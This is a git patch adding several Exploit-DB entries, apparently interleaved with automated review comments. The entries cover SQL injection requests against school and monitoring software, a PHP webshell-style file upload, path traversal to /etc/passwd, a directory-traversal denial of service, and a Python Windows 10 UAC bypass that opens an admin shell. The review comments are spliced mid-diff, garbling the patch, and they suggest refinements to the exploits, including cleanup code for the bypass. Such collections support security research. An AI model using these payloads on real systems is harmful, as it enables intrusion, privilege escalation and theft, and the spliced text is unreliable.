From 4f60a3d8f275b325e92debbe02a6d9c0471ad513 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Wed, 24 Oct 2018 05:02:04 +0000
Subject: [PATCH] DB: 2018-10-24
9 changes to exploits/shellcodes
AudaCity 2.3 - Denial of Service (PoC)
Audacity 2.3 - Denial of Service (PoC)
ServersCheck Monitoring Software 14.3.3 - Denial of Service (PoC)
Microsoft Windows 10 - Local Privilege Escalation (UAC Bypass)
Appsource School Management System 1.0 - 'student_id' SQL Injection
SIM-PKH 2.4.1 - Arbitrary File Upload
ServersCheck Monitoring Software 14.3.3 - 'id' SQL Injection
School ERP Pro+Responsive 1.0 - Arbitrary File Download
School ERP Pro+Responsive 1.0 - 'fid' SQL Injection
SIM-PKH 2.4.1 - 'id' SQL Injection
MGB OpenSource Guestbook 0.7.0.2 - 'id' SQL Injection
---
 exploits/php/webapps/45657.txt | 58 ++++++++++
 exploits/php/webapps/45659.txt | 173 +++++++++++++++++++++++++++++
 exploits/php/webapps/45662.txt | 64 +++++++++++
 exploits/php/webapps/45663.txt | 34 ++++++
 exploits/php/webapps/45664.txt | 35 ++++++
 exploits/windows/dos/45658.txt | 41 +++++++
 exploits/windows/local/45660.py | 48 ++++++++
 exploits/windows/webapps/45661.txt | 58 ++++++++++
 exploits/windows/webapps/45665.txt | 35 ++++++
 files_exploits.csv | 11 +-
 10 files changed, 556 insertions(+), 1 deletion(-)
 create mode 100644 exploits/php/webapps/45657.txt
 create mode 100644 exploits/php/webapps/45659.txt
 create mode 100644 exploits/php/webapps/45662.txt
 create mode 100644 exploits/php/webapps/45663.txt
 create mode 100644 exploits/php/webapps/45664.txt
 create mode 100644 exploits/windows/dos/45658.txt
 create mode 100755 exploits/windows/local/45660.py
 create mode 100644 exploits/windows/webapps/45661.txt
 create mode 100644 exploits/windows/webapps/45665.txt
diff --git a/exploits/php/webapps/45657.txt b/exploits/php/webapps/45657.txt
new file mode 100644
index 000000000..10f56981c
--- /dev/null
+++ b/exploits/php/webapps/45657.txt
@@ -0,0 +1,58 @@
+# Exploit Title: Appsource School Management System 1.0 - 'student_id' SQL Injection
+# Dork: N/A
+# Date: 2018-10-19
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://www.appsource.ug/school/
+# Software Link: https://sourceforge.net/p/appsource-school-system/code/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# Description
+# Librarian, Teacher members can run the sql codes.
+
+# POC:
+# 1)
+# http://localhost/[PATH]/index.php?page=subject_allocation&teacher_id=[SQL]&selection_type=allocate_new_subject&token=
+
+GET /[PATH]/index.php?page=subject_allocation&teacher_id=%2d%33%27%20%20%55%4e%49%4f%4e%20%41%4c%4c%20%53%45%4c%45%43%54%20%31%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2d%2d%20%2d&selection_type=allocate_new_subject&token=6f241aabc241c0f1567f2eef2eb9605f HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: __test=0873e299cd6c3e39a7898a55d9894bc6; PHPSESSID=6ac2af1ef1b06c03438adef38b554175
+Connection: keep-alive
+HTTP/1.1 200 OK
+Server: nginx
+Date: Fri, 19 Oct 2018 10:52:53 GMT
+Content-Type: text/html; charset=UTF-8
+Transfer-Encoding: chunked
+Connection: keep-alive
+Vary: Accept-Encoding
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+
+# POC:
+# 2)
+# http://localhost/[PATH]/index.php?page=give_studentbook&action=borror_book&student_id=[SQL]
+
+GET /[PATH]/index.php?page=give_studentbook&action=borror_book&student_id=%31%27%20%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2d%2d%20%2d HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: __test=0873e299cd6c3e39a7898a55d9894bc6; PHPSESSID=6ac2af1ef1b06c03438adef38b554175
+Connection: keep-alive
+HTTP/1.1 200 OK
+Server: nginx
+Date: Fri, 19 Oct 2018 10:58:27 GMT
+Content-Type: text/html; charset=UTF-8
+Transfer-Encoding: chunked
+Connection: keep-alive
+Vary: Accept-Encoding
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
\ No newline at end of file
diff --git a/exploits/php/webapps/45659.txt b/exploits/php/webapps/45659.txt
new file mode 100644
index 000000000..eb9bfd348
--- /dev/null
+++ b/exploits/php/webapps/45659.txt
@@ -0,0 +1,173 @@
+# Exploit Title: SIM-PKH 2.4.1 - Arbitrary File Upload
+# Dork: N/A
+# Date: 2018-10-22
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://simpkh.sourceforge.io/
+# Software Link: https://sourceforge.net/projects/simpkh/files/latest/download
+# Version: 2.4.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC:
+# 2)
+# Everyone....
+
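Review bot: The header says nothing about the privilege level needed, although the description line and the `Cookie: __test=…; PHPSESSID=…` header on both requests show this is an authenticated (Librarian/Teacher) injection; add `# Authentication: Required (Librarian or Teacher account)` so the finding is not read as pre-auth. The first request also carries `&token=6f241aabc241c0f1567f2eef2eb9605f`, which is presumably a per-session anti-CSRF value that a reader must take from their own session, so a note such as `# token= must be the logged-in session's token` belongs next to the POC 1 URL. Both payloads are fully percent-encoded, which hides what is being tested; a decoded line under each, e.g. `# Decoded: -3' UNION ALL SELECT 1,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())-- -` and `# Decoded: 1' UNION SELECT 1,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3,4,5,6,7,8-- -`, lets a reader verify the column counts without a decoder. The title names only `student_id` while POC 1 targets `teacher_id` on a different page, so the title (and the CSV description) should list both parameters.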
+
+
+
+
+# Upload Path: http://localhost/[PATH]/foto/59phpinfo2.php
+
+POST /[PATH]/admin/modul/mod_pengurus/aksi_pengurus.php?module=pengurus&act=update HTTP/1.1
+Host: 192.168.1.27
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=sbl43od8c5ceereifi8qidm923
+Connection: keep-alive
+Content-Type: multipart/form-data; boundary=---------------------------10453613844351558052030056362
+Content-Length: 261
+-----------------------------10453613844351558052030056362
+Content-Disposition: form-data; name="fupload"; filename="phpinfo2.php"
+Content-Type: application/force-download
+
+-----------------------------10453613844351558052030056362--
+HTTP/1.1 200 OK
+Date: Mon, 22 Oct 2018 15:59:01 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 5554
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+
+# http://localhost/[PATH]/foto/59phpinfo2.php
+
+GET /sim-pkh/foto/59phpinfo2.php HTTP/1.1
+Host: 192.168.1.27
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=sbl43od8c5ceereifi8qidm923
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Mon, 22 Oct 2018 15:59:28 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8
+
+# POC:
+# 2)
+# Users....
+# http://localhost/[PATH]/admin/modul/mod_pengurus/aksi_pengurus.php?module=pengurus&act=update
+
+# Upload Path: http://localhost/[PATH]/foto/25phpinfo.php
+
+POST /[PATH]/admin/modul/mod_pengurus/aksi_pengurus.php?module=pengurus&act=update HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: [PATH]/admin/media.php?module=pengurus&act=editpengurus&id=320323241474
+Cookie: PHPSESSID=sbl43od8c5ceereifi8qidm923
+Connection: keep-alive
+Content-Type: multipart/form-data; boundary=---------------------------84876618815601613714142368
+Content-Length: 2745
+-----------------------------84876618815601613714142368
+Content-Disposition: form-data; name="id_pengurus"
+320323241474
+-----------------------------84876618815601613714142368
+Content-Disposition: form-data; name="no_rekening"
+0401741906
+-----------------------------84876618815601613714142368
+Content-Disposition: form-data; name="nama"
+IMAS
+
+-----------------------------84876618815601613714142368
+Content-Disposition: form-data; name="tempat"
+SUKABUMI
+-----------------------------84876618815601613714142368
+Content-Disposition: form-data; name="tl"
+1985-11-08
+-----------------------------84876618815601613714142368
+Content-Disposition: form-data; name="Usia"
+33
+-----------------------------84876618815601613714142368
+Content-Disposition: form-data; name="fupload"; filename="phpinfo.php"
+Content-Type: application/force-download
+
+-----------------------------84876618815601613714142368
+Content-Disposition: form-data; name="pekerjaan"
+BURUH
+-----------------------------84876618815601613714142368
+Content-Disposition: form-data; name="ibu_kandung"
+ELIS
+-----------------------------84876618815601613714142368
+Content-Disposition: form-data; name="suami"
+-----------------------------84876618815601613714142368
+Content-Disposition: form-data; name="alamat"
+KP BABAKAN RT 09 RW 02
+-----------------------------84876618815601613714142368
+Content-Disposition: form-data; name="no_hp"
+-----------------------------84876618815601613714142368
+Content-Disposition: form-data; name="id_desa"
+4
+-----------------------------84876618815601613714142368
+Content-Disposition: form-data; name="id_kelompok"
+13
+-----------------------------84876618815601613714142368
+Content-Disposition: form-data; name="id_jabatan"
+2
+-----------------------------84876618815601613714142368
+Content-Disposition: form-data; name="id_status"
+1
+-----------------------------84876618815601613714142368
+Content-Disposition: form-data; name="id_pendamping"
+pdp-01
+-----------------------------84876618815601613714142368
+Content-Disposition: form-data; name="bumil"
+0
+-----------------------------84876618815601613714142368
+Content-Disposition: form-data; name="balita"
+1
+-----------------------------84876618815601613714142368
+Content-Disposition: form-data; name="apras"
+1
+-----------------------------84876618815601613714142368
+Content-Disposition: form-data; name="sd"
+0
+-----------------------------84876618815601613714142368
+Content-Disposition: form-data; name="smp"
+2
+-----------------------------84876618815601613714142368
+Content-Disposition: form-data; name="sma"
+0
+-----------------------------84876618815601613714142368--
+HTTP/1.1 302 Found
+Date: Mon, 22 Oct 2018 15:42:39 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Location: ../../media.php?module=pengurus
+Content-Length: 1976
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
\ No newline at end of file
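Review bot: The first POC is labelled `# Everyone....` (which reads as unauthenticated), but the captured request to `POST /[PATH]/admin/modul/mod_pengurus/aksi_pengurus.php?module=pengurus&act=update` still sends `Cookie: PHPSESSID=sbl43od8c5ceereifi8qidm923`, the same session used by the second (`# Users....`) POC and by the companion 45664 SQLi, so the text does not actually demonstrate a pre-auth upload; it should be re-run without the cookie and the header should carry an explicit `# Authentication:` line stating the result. Both POC sections are numbered `# 2)`; the first should be `# 1)`. The `fupload` part shows `Content-Type: application/force-download` with no file body visible, and no upload form or payload survives in the text, so a reader cannot see what bytes produced `foto/59phpinfo2.php`; restating it in a comment such as `# Payload body: <?php phpinfo(); ?>` would make the PoC self-contained. The verification request uses the literal `GET /sim-pkh/foto/59phpinfo2.php` and `Host: 192.168.1.27` where the rest of the file uses `/[PATH]/` and `TARGET`, so the lab host leaks and the placeholders are inconsistent. A one-line remediation note would also help defenders: `foto/` executes uploaded `.php`, so the fix is a server-side extension/MIME allow-list plus storing uploads where scripts cannot execute.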
diff --git a/exploits/php/webapps/45662.txt b/exploits/php/webapps/45662.txt
new file mode 100644
index 000000000..3332691d0
--- /dev/null
+++ b/exploits/php/webapps/45662.txt
@@ -0,0 +1,64 @@
+# Exploit Title: School ERP Pro+Responsive 1.0 - Arbitrary File Download
+# Dork: N/A
+# Date: 2018-10-23
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://www.arox.in/
+# Software Link: https://sourceforge.net/projects/school-management-system-php/files/latest/download
+# Software Link: http://erp.arox.in/ http://erp1.arox.in/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC:
+# 1)
+# http://localhost/[PATH]/student_staff/download.php?document=[FILE]
+# http://localhost/[PATH]/office_admin/download.php?document=[FILE]
+#
+# /[PATH]/student_staff/download.php
+# /[PATH]/office_admin/download.php
+# ....
+# if ( isset($_REQUEST["document"])&&$_REQUEST["document"]!="") {
+# $file = $_REQUEST['document'];
+# header("Content-type: application/force-download");
+# header("Content-Transfer-Encoding: Binary");
+# header("Content-length: ".filesize($file));
+# header("Content-disposition: attachment; filename=\"".$file."\"");
+# readfile($file);
+# exit;
+# }
+# ....
+
+GET /[PATH]/student_staff/download.php?document=download.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Tue, 23 Oct 2018 12:30:01 GMT
+Server: Apache
+Content-Transfer-Encoding: Binary
+Content-Disposition: attachment; filename="download.php"
+Content-Length: 337
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: application/force-download
+
+GET /[PATH]/office_admin/download.php?document=../../../../../etc/passwd HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Tue, 23 Oct 2018 12:31:34 GMT
+Server: Apache
+Content-Transfer-Encoding: Binary
+Content-Disposition: attachment; filename="../../../../../etc/passwd"
+Content-Length: 46368
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: application/force-download
\ No newline at end of file
diff --git a/exploits/php/webapps/45663.txt b/exploits/php/webapps/45663.txt
new file mode 100644
index 000000000..577b49f8a
--- /dev/null
+++ b/exploits/php/webapps/45663.txt
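Review bot: The quoted sink `$file = $_REQUEST['document']; … readfile($file);` is reached by both requests without any `Cookie` header, so the header should state `# Authentication: Not required` explicitly instead of leaving the reader to infer it from the capture. Because the value is read from `$_REQUEST`, the same traversal is reachable through a POST body or a cookie named `document`, not only the query string shown, which matters for anyone writing a detection rule on the URL alone. The second request proves traversal out of the web root (`../../../../../etc/passwd`) and the first proves disclosure of the application's own source, so "Path Traversal / Arbitrary File Read" describes the finding better than "Download". For the vendor-facing fix the advisory could note the standard pattern: resolve `basename($_REQUEST['document'])` beneath a fixed document directory with `realpath()`, reject any result that does not start with that directory, and never echo the client-supplied name back into `Content-disposition`.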
@@ -0,0 +1,34 @@
+# Exploit Title: School ERP Pro+Responsive 1.0 - 'fid' SQL Injection
+# Dork: N/A
+# Date: 2018-10-23
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://www.arox.in/
+# Software Link: https://sourceforge.net/projects/school-management-system-php/files/latest/download
+# Software Link: http://erp.arox.in/ http://erp1.arox.in/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC:
+# 1)
+# http://localhost/[PATH]/student_staff/?pid=54&action=staff_timetable&fid=[SQL]
+
+GET /[PATH]/student_staff/?pid=54&action=staff_timetable&fid=-%31%20%75%6e%49%6f%4e%20%73%45%6c%45%63%74%20%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2d%2d%20%2d HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=nno01rkuj0ql0k1sb96uhg1va1
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Tue, 23 Oct 2018 12:11:18 GMT
+Server: Apache
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 68790
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
\ No newline at end of file
diff --git a/exploits/php/webapps/45664.txt b/exploits/php/webapps/45664.txt
new file mode 100644
index 000000000..28c0732ec
--- /dev/null
+++ b/exploits/php/webapps/45664.txt
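Review bot: The request carries `Cookie: PHPSESSID=nno01rkuj0ql0k1sb96uhg1va1` and targets `/student_staff/`, so this appears to be a post-login injection, yet the header has no line saying so; add `# Authentication: Required` and name the role that was used, since the same product also has a pre-auth file read (45662) and the two should not be conflated. The `fid` payload is a mixed-case, percent-encoded information_schema dump (`-1 unIoN sElEct 1,(…),3-- -`), which hides the one fact a reader needs — that the injected `SELECT` appears to need three columns; a decoded minimal line such as `# Decoded: fid=-1 UNION SELECT 1,VERSION(),3-- -` would make the finding reproducible without a decoder and easy to re-check against a fix. The injection also depends on `pid=54&action=staff_timetable`, so the affected page/action belongs in the header alongside the parameter name.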
@@ -0,0 +1,35 @@
+# Exploit Title: SIM-PKH 2.4.1 - 'id' SQL Injection
+# Dork: N/A
+# Date: 2018-10-22
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://simpkh.sourceforge.io/
+# Software Link: https://sourceforge.net/projects/simpkh/files/latest/download
+# Version: 2.4.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC:
+# 1)
+# Users....
+# http://localhost/[PATH]/admin/media.php?module=pengurus&act=editpengurus&id=[SQL]
+
+GET /[PATH]/admin/media.php?module=pengurus&act=editpengurus&id=-1%27++UniOn(sELect+0x283129%2cCONCAT(0x203a20,User(),DatabaSE(),VErsiON())%2c0x283329%2c0x283429%2c0x283529%2c%30%78%32%38%33%36%32%39%2c0x283729%2c0x283829%2c0x283929%2c0x28313029%2c0x28313129%2c0x28313229%2c0x28313329%2c0x28313429%2c0x28313529%2c0x28313629%2c%30%78%32%38%33%31%33%37%32%39%2c0x28313829%2c0x28313929%2c0x28323029%2c%30%78%32%38%33%32%33%31%32%39%2c0x28323229)--+- HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=sbl43od8c5ceereifi8qidm923
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Mon, 22 Oct 2018 15:31:42 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8
\ No newline at end of file
diff --git a/exploits/windows/dos/45658.txt b/exploits/windows/dos/45658.txt
new file mode 100644
index 000000000..88f636cec
--- /dev/null
+++ b/exploits/windows/dos/45658.txt
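Review bot: `# Users....` and the `Cookie: PHPSESSID=sbl43od8c5ceereifi8qidm923` header (the same session reused by 45659) show this is a post-authentication injection on an `/admin/` page, but the header has no `# Authentication:` line and does not say which role was logged in; add it, because a pre-auth and a post-auth SQLi in the same product are triaged very differently. The payload `-1' UniOn(sELect 0x283129,CONCAT(0x203a20,User(),DatabaSE(),VErsiON()),0x283329,…,0x28323229)-- -` is partly percent-encoded and partly mixed-case, which obscures the two facts a reader needs — that the injection is in a quoted string context and that the query has 22 columns; a decoded line stating both would make the PoC verifiable at a glance. The vulnerable page is the same `editpengurus&id=` form that 45659 uses as its `Referer`, so cross-referencing the two entries in the header would help readers assess the chained impact (SQLi to obtain credentials, then the authenticated upload for code execution).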
@@ -0,0 +1,41 @@
+# Exploit Title: ServersCheck Monitoring Software 14.3.3 - Denial of Service (PoC)
+# Author: John Page (aka hyp3rlinx)
+# Date: 2018-10-23
+# Vendor: www.serverscheck.com
+# Software Link: http://downloads.serverscheck.com/monitoring_software/setup.exe
+# CVE: N/A
+# References:
+# http://hyp3rlinx.altervista.org/advisories/CVE-2018-18552-SERVERSCHECK-MONITORING-SOFTWARE-ARBITRARY-FILE-WRITE-DOS.txt
+# https://serverscheck.com/monitoring-software/release.asp
+# Affected Component: "sensor_details.html" webpage the "id" parameter
+
+# Security Issue
+# ServersCheck Monitoring Software allows remote attackers to cause a denial of service
+# (menu functionality loss) by creating an LNK file that points to a second LNK file, if this
+# second LNK file is associated with a Start menu item. Ultimately, this behavior comes
+# from a Directory Traversal bug (via the sensor_details.html id parameter) that allows
+# creating empty files in arbitrary directories.
+
+# Exploit/POC
+# DOS Command Prompt .LNK under Start Menu change to desired user.
+
+http://127.0.0.1:1272/sensor_details.html?id=../../../../Users//AppData/Roaming/Microsoft/Windows/Start%20Menu/Programs/Accessories/Command%20Prompt.lnk%00
+
+# DOS Run .LNK under Start Menu
+
+http://127.0.0.1:1272/sensor_details.html?id=../../../../Users//AppData/Roaming/Microsoft/Windows/Start%20Menu/Programs/Accessories/Run.lnk%00
+
+# DOS Internet Explorer .LNK from Start Menu
+http://127.0.0.1:1272/sensor_details.html?id=../../../../Users//AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Internet Explorer.LNK%00
+
+# Victim will get error message from server like "Error retrieving sensor details from database".
+# Then,No Internet Explorer, Command or Run prompt via the Start/Programs/Accessories/
+# and Task Menu links. However, can still be launch by other means. Tested successfully on
+# Windows 7 OS
+
+# [Disclosure Timeline]
+# Vendor Notification: October 6, 2018
+# Vendor acknowledgement: October 7, 2018
+# Vendor release v14.3.4 : October 7th, 2018
+# CVE assign by Mitre: October 21, 2018
+# October 22, 2018 : Public Disclosure
\ No newline at end of file
diff --git a/exploits/windows/local/45660.py b/exploits/windows/local/45660.py
new file mode 100755
index 000000000..f61e2f77b
--- /dev/null
+++ b/exploits/windows/local/45660.py
@@ -0,0 +1,48 @@
+#!/usr/bin/env python
+#
+# Exploit Title: Windows 10 UAC Bypass by computerDefault
+# Date: 2018-10-18
+# Exploit Author: Fabien DROMAS - Security consultant @ Synetis
+# Twitter: st0rnpentest
+#
+# Vendor Homepage: www.microsoft.com
+# Version: Version 10.0.17134.285
+# Tested on: Windows 10 pro Version 10.0.17134.285
+#
+
+import os
+import sys
+import ctypes
+import _winreg
+
+
+def create_reg_key(key, value):
+ try:
+ _winreg.CreateKey(_winreg.HKEY_CURRENT_USER, 'Software\Classes\ms-settings\shell\open\command')
+ registry_key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, 'Software\Classes\ms-settings\shell\open\command', 0, _winreg.KEY_WRITE)
+ _winreg.SetValueEx(registry_key, key, 0, _winreg.REG_SZ, value)
+ _winreg.CloseKey(registry_key)
+ except WindowsError:
+ raise
+
+def exec_bypass_uac(cmd):
+ try:
+ create_reg_key('DelegateExecute', '')
+ create_reg_key(None, cmd)
+ except WindowsError:
+ raise
+
+def bypass_uac():
+ try:
+ current_dir = os.path.dirname(os.path.realpath(__file__)) + '\\' + __file__
+ cmd = "C:\windows\System32\cmd.exe"
+ exec_bypass_uac(cmd)
+ os.system(r'C:\windows\system32\ComputerDefaults.exe')
+ return 1
+ except WindowsError:
+ sys.exit(1)
+
+if __name__ == '__main__':
+
+ if bypass_uac():
+ print "Enjoy your Admin Shell :)"
\ No newline at end of file
diff --git a/exploits/windows/webapps/45661.txt b/exploits/windows/webapps/45661.txt
new file mode 100644
index 000000000..0eed29fa5
--- /dev/null
+++ b/exploits/windows/webapps/45661.txt
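Review bot: `# CVE: N/A` contradicts both the reference URL in the same header, which is named `CVE-2018-18552-SERVERSCHECK-…`, and the timeline entry `CVE assign by Mitre: October 21, 2018`; set `# CVE: CVE-2018-18552`. The primitive the text describes — a directory traversal in `sensor_details.html?id=` with a `%00` terminator that "creat[es] empty files in arbitrary directories", and, since the example paths are existing shortcuts, presumably overwrites them — is an arbitrary file write/truncation by the service account, which is more severe than the "Denial of Service (PoC)" title conveys; the advisory should say so and present the broken Start-menu LNKs as one demonstration of it. The three URLs contain `Users//AppData`, where the empty segment is where a username belongs, and the hint "change to desired user" is easy to miss; writing `Users/[USER]/AppData/…` makes that explicit. Whether the request requires a ServersCheck login is not stated anywhere and should be.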
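Review bot: The hijacked handler is never removed: after `os.system(r'C:\windows\system32\ComputerDefaults.exe')` returns, `HKCU\Software\Classes\ms-settings\shell\open\command` still points at `cmd.exe` with an empty `DelegateExecute`, so every later ms-settings: activation on that account re-runs the payload and the key remains a lasting, easily detected artifact (registry-set events on that path are a standard hunt for this technique). Delete the key chain once the launcher has returned, deepest key first because `_winreg.DeleteKey` refuses non-empty keys, and do it in a `finally` so a failed launch does not leave the hijack behind either. Smaller points in the same hunk: `current_dir` is computed and never used, the three `except WindowsError: raise` blocks are no-ops, the registry paths and `"C:\windows\System32\cmd.exe"` are non-raw strings that only work because none of their backslash pairs happen to be escapes, and the file is Python 2 only (`_winreg`, `print "…"`), which the header should state. The header should also say that this kind of auto-elevation bypass presumably requires the current user to be a member of Administrators with UAC at its default prompt level; it does nothing for a standard user.
```python
def remove_reg_key():
    """Undo the ms-settings handler hijack so it does not persist after the bypass."""
    for sub in (r'Software\Classes\ms-settings\shell\open\command',
                r'Software\Classes\ms-settings\shell\open',
                r'Software\Classes\ms-settings\shell',
                r'Software\Classes\ms-settings'):
        try:
            _winreg.DeleteKey(_winreg.HKEY_CURRENT_USER, sub)
        except WindowsError:
            pass  # already gone or never created

def bypass_uac():
    try:
        cmd = r"C:\windows\System32\cmd.exe"
        exec_bypass_uac(cmd)
        os.system(r'C:\windows\system32\ComputerDefaults.exe')
        return 1
    except WindowsError:
        sys.exit(1)
    finally:
        remove_reg_key()  # clean up whether or not the launcher succeeded
```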
@@ -0,0 +1,58 @@
+# Exploit Title: ServersCheck Monitoring Software 14.3.3 - 'id' SQL Injection
+# Author: John Page (aka hyp3rlinx)
+# Date: 2018-10-23
+# Vendor: www.serverscheck.com
+# Software link: http://downloads.serverscheck.com/monitoring_software/setup.exe
+# CVE: N/A
+# References:
+# https://serverscheck.com/monitoring-software/release.asp
+# http://hyp3rlinx.altervista.org/advisories/CVE-2018-18550-SERVERSCHECK-MONITORING-SOFTWARE-SQL-INJECTION.txt
+
+# Security Issue
+# ServersCheck Monitoring Software allows for SQL Injection by an authenticated user
+# via the alerts.html "id" parameter.
+
+# Exploit/POC
+http://127.0.0.1:1272/alerts.html?id=18391
+
+Result:
+Alerts History for SENSORXY
+No data available in table
+
+Then using 'OR+2=2,
+
+http://127.0.0.1:1272/alerts.html?id=18391+'OR+2=2+--+
+
+Result:
+
+155 a day ago CPU on 127.0.0.1 Status Change DOWN to OK
+154 a day ago CPU on 127.0.0.1 Status Change OK to DOWN
+153 a day ago test Status Change OK to DOWN Unable to connect to host
+
+
